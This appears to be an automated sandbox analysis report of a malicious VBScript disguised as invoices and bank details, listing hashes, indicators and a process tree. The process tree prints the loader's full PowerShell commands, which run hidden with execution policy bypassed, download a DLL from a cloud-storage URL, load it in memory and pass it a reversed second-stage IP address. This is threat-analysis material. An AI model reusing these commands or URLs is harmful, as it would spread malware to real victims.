Analysis
-
max time kernel
3s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
13/01/2024, 05:37
Static task
static1
Behavioral task
behavioral1
Sample
facturas y datos bancarios.vbs
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
facturas y datos bancarios.vbs
Resource
win10v2004-20231222-en
General
-
Target
facturas y datos bancarios.vbs
-
Size
4KB
-
MD5
459d63c87281a7c35bd3fb015d41c155
-
SHA1
14d20f30b220aa969573953606ddcd3392d3bfe2
-
SHA256
0215fb5ca62cce5debc7bb6720ef089b075aa4167632ae21f9a1df42636b880c
-
SHA512
ed0e3cb0430a7b2538da3aaa77cfbeeb17d32f5cf625c6eb33177409dd7754ae79ebf955ecdea23bc8ab3e4493dce5bdf7abbcd1bb69c723c93a1d63b3c2a1c7
-
SSDEEP
96:SDv8vBDqazRdWDkXrV+DVfFf8f7RIT9r17T9rN9rz9rdf9rB:0uxda5tUD+T9x7T9R9f95f9l
Malware Config
Extracted
https://firebasestorage.googleapis.com/v0/b/truk-droid.appspot.com/o/Droid%2BTurk.txt?alt=media&token=9399305d-e471-4325-b9cf-905c0718f95e
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 1680 WScript.exe 5 1680 WScript.exe 7 1680 WScript.exe 10 1680 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1680 wrote to memory of 2596 1680 WScript.exe 29 PID 1680 wrote to memory of 2596 1680 WScript.exe 29 PID 1680 wrote to memory of 2596 1680 WScript.exe 29
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\facturas y datos bancarios.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AdAByAHUAawAtAGQAcgBvAGkAZAAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBEAHIAbwBpAGQAJQAyAEIAVAB1AHIAawAuAHQAeAB0AD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQA5ADMAOQA5ADMAMAA1AGQALQBlADQANwAxAC0ANAAzADIANQAtAGIAOQBjAGYALQA5ADAANQBjADAANwAxADgAZgA5ADUAZQAnACkAKQA7AFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAGUAKAAnAEYAaQBiAGUAcgAuAEgAbwBtAGUAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4ANAA2AGUAcwBhAGIAeQByAGUAdgBvAGMAZQByAHQAYwBhAHQAbgBvAGMAbgBpAGcAaQByAG8AZABpAG8AcgBkAC8AMgA5AC4AMAA3ADEALgAyADYALgA1ADQALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD2⤵PID:2596
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/truk-droid.appspot.com/o/Droid%2BTurk.txt?alt=media&token=9399305d-e471-4325-b9cf-905c0718f95e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.46esabyrevocertcatnocnigirodiord/29.071.26.54//:ptth'))"3⤵PID:2124
-
-